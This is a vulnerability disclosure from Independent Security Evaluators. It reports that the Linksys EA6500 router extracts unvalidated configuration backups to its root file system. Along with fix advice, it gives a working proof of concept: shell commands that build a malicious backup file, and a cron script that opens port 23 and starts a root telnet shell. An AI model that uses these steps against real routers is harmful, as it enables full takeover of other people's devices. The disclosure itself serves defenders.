--- title: 'Linksys EA6500 - Independent Security Evaluators' description: 'The Linksys EA6500 does not properly validate backed-up configuration files that are restored through the web management interface. If a device administrator can be fooled into restoring a malicious configuration file, an attacker can create or overwrite arbitrary files on the EA6500's file system, and obtain remote, root shell access.' ---

Compromising the Linksys EA6500

[return to summary]

Description

The Linksys EA6500 does not properly validate backed-up configuration files that are restored through the web management interface. If a device administrator can be fooled into restoring a malicious configuration file, an attacker can create or overwrite arbitrary files on the EA6500's file system, and obtain remote, root shell access.

Attack Requirements

  • The victim must be fooled in to logging in to the EA6500's web interface and restoring a malicious configuration file.

Details

Backup configuration files for the Linksys EA6500 contain a tar.gz archive file, and upon restoration, the device extracts the archive to the root of the file system. By including a telnet daemon, and a cron script that starts the daemon, an attacker can gain root shell access to the router.

Vulnerable Firmware is 1.1.28.147876

Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.

Recommendations to the vendor

  • Configuration files should be validated before they are restored to the router.
  • Configuration files should contain only data that is carefully parsed by the router, and not arbitrary files that are extracted to the file system.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Never restore a configuration file from an untrusted source.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

  • Create the necessary directory structure: 
    mkdir -p tmp/cron/cron.everyminute
  • Write the script shown in Figure 1 to the file
    tmp/cron/cron.everyminute/utelnetd.sh, and set 755
    permissions.
  • Download the utelnetd source code from the Internet,
    cross-compile a statically linked version for the mipsel
    architecture, and write it to tmp/utelnetd, with 755
    permissions.
  • Archive the files to a tar.gz file: 
    tar -czpvf backup.tar.gz --owner=root --group=root \
     tmp
  • Add the header necessary for the router to process as a
    configuration backup:

    echo -e '0x0002\n'`stat -c %s backup.tar.gz` | \
     cat - backup.tar.gz > backup.cfg
  • Provide the resulting backup.cfg file to the victim.
#!/bin/sh
/sbin/iptables -I INPUT -p tcp --dport 23 -j ACCEPT
/tmp/utelnetd -l /bin/sh

Figure 1. Script to open port 23 to the Internet and start a Telnet server.

References

  • Utelnetd on Sourceforge
  • CVE-2013-3064: Unvalidated URL Redirect
  • CVE-2013-3065: DOM Cross-Site Scripting
  • CVE-2013-3066: Information Disclosure

Credit

  • Discovered By: Jacob Thompson – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Thompson – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io